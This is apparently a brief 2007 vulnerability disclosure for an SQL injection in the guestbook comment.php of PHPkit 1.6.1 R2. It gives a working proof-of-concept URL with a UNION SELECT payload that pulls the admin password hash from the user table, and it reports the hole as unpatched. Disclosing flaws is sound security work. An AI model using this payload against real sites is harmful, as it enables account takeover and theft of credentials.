Pretty much the same, but for completeness... ;-) QL Injection in PHPkit 1.6.1 R2 ================================ Discovered on 09.01.2007 by yorn. Description: ------------ http://www.phpkit.de/ PHPkit is a php/sql based portal software. Problem: -------- SQL Injection: There are multiple SQL injections in PHPkit. Just check bugtraq. I think that this is a "new" one, so here we go: The "Gästebuch" is prone to a sql injection vulnerablility in comment.php. It is possible to gain access to the admin password hash: POC: comment.php&comcat=gb&subid=-1'%20UNION%20SELECT%201,1,1,1,1,1,user_pw,1%20from%20PHPKIT_USER_TABLE%20where%20%20user_id=1/* Vendor Status: -------------- Vendor has been informed on the date of discovery. Not patched yet.
